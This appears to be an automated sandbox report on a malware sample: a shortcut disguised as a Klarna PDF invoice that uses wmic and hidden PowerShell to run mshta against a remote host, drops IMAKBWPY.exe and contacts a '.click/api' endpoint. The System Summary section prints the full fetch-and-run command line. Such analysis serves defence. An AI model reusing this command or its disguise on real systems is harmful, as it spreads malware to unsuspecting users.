            Source: pyexec.exe, 00000012.00000002.2153513648.000000000889B000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349631887.0000000008856000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528849936.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
            Source: pyexec.exe, 00000012.00000002.2153513648.000000000889B000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349631887.0000000008856000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528849936.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
            Source: pyexec.exe, 00000012.00000002.2153513648.000000000889B000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349631887.0000000008856000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528849936.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
            Source: pyexec.exe, 00000012.00000002.2153513648.000000000889B000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349631887.0000000008856000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528849936.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
            Source: powershell.exe, 00000006.00000002.1948905614.000001EF00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000006.00000002.2073347152.000001EF10072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000006.00000002.2073347152.000001EF10072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000006.00000002.2073347152.000001EF10072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: pyexec.exe, 00000012.00000002.2153513648.000000000889B000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349631887.0000000008856000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528849936.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmp, pyexec.exe.17.dr, pyexec.exe.18.drString found in binary or memory: https://d.symcb.com/cps0%
            Source: pyexec.exe, 00000012.00000002.2153513648.000000000889B000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349631887.0000000008856000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528849936.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmp, pyexec.exe.17.dr, pyexec.exe.18.drString found in binary or memory: https://d.symcb.com/rpa0
            Source: pyexec.exe.17.dr, pyexec.exe.18.drString found in binary or memory: https://d.symcb.com/rpa0.
            Source: svchost.exe, 00000005.00000003.1807192834.000001EFFC242000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
            Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
            Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
            Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
            Source: svchost.exe, 00000005.00000003.1807192834.000001EFFC242000.00000004.00000800.00020000.00000000.sdmp, edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
            Source: powershell.exe, 00000006.00000002.1948905614.000001EF0022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: mshta.exe, 00000004.00000002.2245400231.000001C8462C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2235882267.000001C8462C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2218602445.000001C8462C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
            Source: powershell.exe, 00000006.00000002.1948905614.000001EF0069E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://naubeautylus.c
            Source: powershell.exe, 00000006.00000002.1948905614.000001EF0069E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1948905614.000001EF0022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://naubeautylus.ch
            Source: mshta.exe, 00000004.00000002.2245031576.000001C846286000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2228118175.000001C846286000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2221355733.000001C846286000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1948905614.000001EF0069E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://naubeautylus.ch/
            Source: mshta.exe, 00000004.00000002.2244789492.000001C846210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2221355733.000001C846286000.00000004.00000020.00020000.00000000.sdmp, KlarnaInvoice229837.pdf.lnkString found in binary or memory: https://naubeautylus.ch/Headerfrontend
            Source: powershell.exeString found in binary or memory: https://naubeautylus.ch/Headerfrontend$global:?
            Source: mshta.exe, 00000004.00000002.2246667189.000001D048D81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://naubeautylus.ch/Headerfrontend...
            Source: mshta.exe, 00000004.00000002.2244789492.000001C846210000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://naubeautylus.ch/Headerfrontend2
            Source: mshta.exe, 00000004.00000003.2228118175.000001C846251000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2221355733.000001C846250000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2245031576.000001C846251000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://naubeautylus.ch/Headerfrontend:
            Source: mshta.exe, 00000004.00000002.2244789492.000001C846210000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://naubeautylus.ch/HeaderfrontendC:
            Source: mshta.exe, 00000004.00000002.2244755190.000001C846200000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://naubeautylus.ch/HeaderfrontendH
            Source: mshta.exe, 00000004.00000003.2228118175.000001C846286000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2221355733.000001C846286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://naubeautylus.ch/HeaderfrontendWWC:
            Source: WMIC.exe, 00000000.00000002.1752768362.0000017A53C70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://naubeautylus.ch/HeaderfrontendamFiles=C:
            Source: mshta.exe, 00000004.00000003.2228118175.000001C846251000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2221355733.000001C846250000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2245031576.000001C846251000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://naubeautylus.ch/Headerfrontendf
            Source: mshta.exe, 00000004.00000003.2228736011.000001D04BFA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://naubeautylus.ch/Headerfrontendhttps://naubeautylus.ch/Headerfrontend07
            Source: mshta.exe, 00000004.00000003.2228118175.000001C846251000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2221355733.000001C846250000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2245031576.000001C846251000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://naubeautylus.ch/Headerfrontendj
            Source: mshta.exe, 00000004.00000002.2245886446.000001C8463F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://naubeautylus.ch/HeaderfrontenduserLOCAL
            Source: WMIC.exe, 00000000.00000003.1750973050.0000017A53AF9000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000000.00000002.1752627353.0000017A53B06000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000000.00000003.1751097652.0000017A53B05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://naubeautylus.ch/Headerfrontendm
            Source: mshta.exe, 00000004.00000002.2245031576.000001C846286000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2228118175.000001C846286000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2221355733.000001C846286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://naubeautylus.ch/Headerfrontendoft
            Source: mshta.exe, 00000004.00000003.2220749210.000001D04CE59000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2247390039.000001D04CE59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://naubeautylus.ch/HeaderfrontendsLMEMP
            Source: mshta.exe, 00000004.00000002.2244789492.000001C846239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://naubeautylus.ch/Headerfrontendt
            Source: powershell.exe, 00000006.00000002.1948905614.000001EF0069E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://naubeautylus.ch/I
            Source: powershell.exe, 00000006.00000002.1948905614.000001EF0069E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://naubeautylus.ch/IM
            Source: powershell.exe, 00000006.00000002.1948905614.000001EF0069E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://naubeautylus.ch/IMA
            Source: powershell.exe, 00000006.00000002.1948905614.000001EF0069E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://naubeautylus.ch/IMAK
            Source: powershell.exe, 00000006.00000002.1948905614.000001EF0069E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://naubeautylus.ch/IMAKB
            Source: powershell.exe, 00000006.00000002.1948905614.000001EF0069E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://naubeautylus.ch/IMAKBW
            Source: powershell.exe, 00000006.00000002.1948905614.000001EF0069E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://naubeautylus.ch/IMAKBWP
            Source: powershell.exe, 00000006.00000002.1948905614.000001EF0069E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://naubeautylus.ch/IMAKBWPY
            Source: powershell.exe, 00000006.00000002.1948905614.000001EF0069E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://naubeautylus.ch/IMAKBWPY.
            Source: powershell.exe, 00000006.00000002.1948905614.000001EF0069E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://naubeautylus.ch/IMAKBWPY.e
            Source: powershell.exe, 00000006.00000002.1948905614.000001EF0069E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://naubeautylus.ch/IMAKBWPY.ex
            Source: powershell.exe, 00000006.00000002.1948905614.000001EF0069E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://naubeautylus.ch/IMAKBWPY.exe
            Source: powershell.exe, 00000006.00000002.1948905614.000001EF0022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://naubeautylus.ch/KlarnaInvoice42611.pdf
            Source: powershell.exe, 00000006.00000002.2073347152.000001EF10072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: svchost.exe, 00000005.00000003.1807192834.000001EFFC242000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
            Source: edb.log.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
            Source: explorer.exe, 00000016.00000003.2570257382.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.2570568622.0000000003420000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.2570696781.0000000003428000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://passworoggre.click/
            Source: explorer.exe, 00000016.00000003.2570257382.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.2570568622.0000000003420000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.2570696781.0000000003428000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://passworoggre.click/Q
            Source: explorer.exe, 00000016.00000003.2570257382.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.2570696781.000000000342D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572340840.0000000003431000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.2570822412.000000000342F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.2570257382.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.2570257382.00000000033A0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572041044.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.2570985206.00000000033CA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572041044.00000000033A0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572182630.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://passworoggre.click/api
            Source: explorer.exe, 00000016.00000003.2570257382.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.2570985206.00000000033CA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572182630.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://passworoggre.click/apiO
            Source: explorer.exe, 00000016.00000003.2570257382.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572041044.00000000033B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://passworoggre.click:443/api
            Source: pyexec.exe.17.dr, pyexec.exe.18.drString found in binary or memory: https://sectigo.com/CPS0
            Source: pyexec.exe, 00000012.00000002.2153513648.000000000889B000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349631887.0000000008856000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528849936.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownHTTPS traffic detected: 62.182.21.105:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 62.182.21.105:443 -> 192.168.2.4:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.59.81:443 -> 192.168.2.4:49815 version: TLS 1.2

            System Summary

            barindex
            Source: WMIC.exe, 00000000.00000002.1752768362.0000017A53C7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://naubeautylus.ch/Headerfrontend"memstr_d709ac6b-6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\IMAKBWPY.exeJump to dropped file
            Source: KlarnaInvoice229837.pdf.lnkLNK file: process call create "powershell -w 1 . \W*\S*2\m*ht*e https://naubeautylus.ch/Headerfrontend"
            Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeFile deleted: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exe
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009D001D16_2_009D001D
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009C41EA16_2_009C41EA
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009A62AA16_2_009A62AA
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009D03D516_2_009D03D5
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009CC33216_2_009CC332
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009DA56016_2_009DA560
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009D07AA16_2_009D07AA
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009AA8F116_2_009AA8F1
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009DAA0E16_2_009DAA0E
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009CFB8916_2_009CFB89
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009D0B6F16_2_009D0B6F
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009D2C1816_2_009D2C18
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009D2E4716_2_009D2E47
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009DEE7C16_2_009DEE7C
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_0026001D17_2_0026001D
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_002541EA17_2_002541EA
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_002362AA17_2_002362AA
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_0025C33217_2_0025C332
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_002603D517_2_002603D5
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_0026A56017_2_0026A560
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_002607AA17_2_002607AA
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_0023A8F117_2_0023A8F1
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_0026AA0E17_2_0026AA0E
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_00260B6F17_2_00260B6F
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_0025FB8917_2_0025FB89
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_00262C1817_2_00262C18
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_0026EE7C17_2_0026EE7C
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_00262E4717_2_00262E47
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_1003903017_2_10039030
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_100330E017_2_100330E0
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_1003818017_2_10038180
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_100361D017_2_100361D0
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_1002C2C017_2_1002C2C0
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_100452CC17_2_100452CC
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_1000C30017_2_1000C300
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_1000F35017_2_1000F350
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_1001C36017_2_1001C360
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_1004836017_2_10048360
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_100383A017_2_100383A0
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_1002E3B017_2_1002E3B0
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_100384D017_2_100384D0
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_1000B57017_2_1000B570
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_1002D58017_2_1002D580
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_1000264017_2_10002640
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_1003864017_2_10038640
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_100277C017_2_100277C0
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_1002882017_2_10028820
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_1003890017_2_10038900
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_1004899017_2_10048990
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_1002F9E017_2_1002F9E0
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_1002DA2017_2_1002DA20
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_10039A5017_2_10039A50
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_10038AC017_2_10038AC0
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_10047AE017_2_10047AE0
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_1002BAF017_2_1002BAF0
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_10039B9017_2_10039B90
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_10039CE017_2_10039CE0
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_1001CE0017_2_1001CE00
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_10046E7017_2_10046E70
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_1003DE7917_2_1003DE79
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_1001FE9017_2_1001FE90
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_1002EF0017_2_1002EF00
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeCode function: 18_2_6C1F8DF018_2_6C1F8DF0
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeCode function: 18_2_6C123F1018_2_6C123F10
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeCode function: 18_2_6C1F9F3018_2_6C1F9F30
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeCode function: 18_2_6C12229018_2_6C122290
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeCode function: 18_2_6C1FBBC018_2_6C1FBBC0
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeCode function: 18_2_6C1213E018_2_6C1213E0
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeCode function: 18_2_6C1213E118_2_6C1213E1
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeCode function: String function: 6C1B7460 appears 36 times
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeCode function: String function: 6C2308E0 appears 256 times
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeCode function: String function: 6C1DCAD0 appears 120 times
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeCode function: String function: 6C22FDF0 appears 221 times
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeCode function: String function: 6C251420 appears 79 times
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: String function: 10025950 appears 133 times
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: String function: 1003B1C2 appears 62 times
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: String function: 00270237 appears 685 times
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: String function: 00233821 appears 500 times
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: String function: 002732F3 appears 85 times
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: String function: 1003AEBF appears 35 times
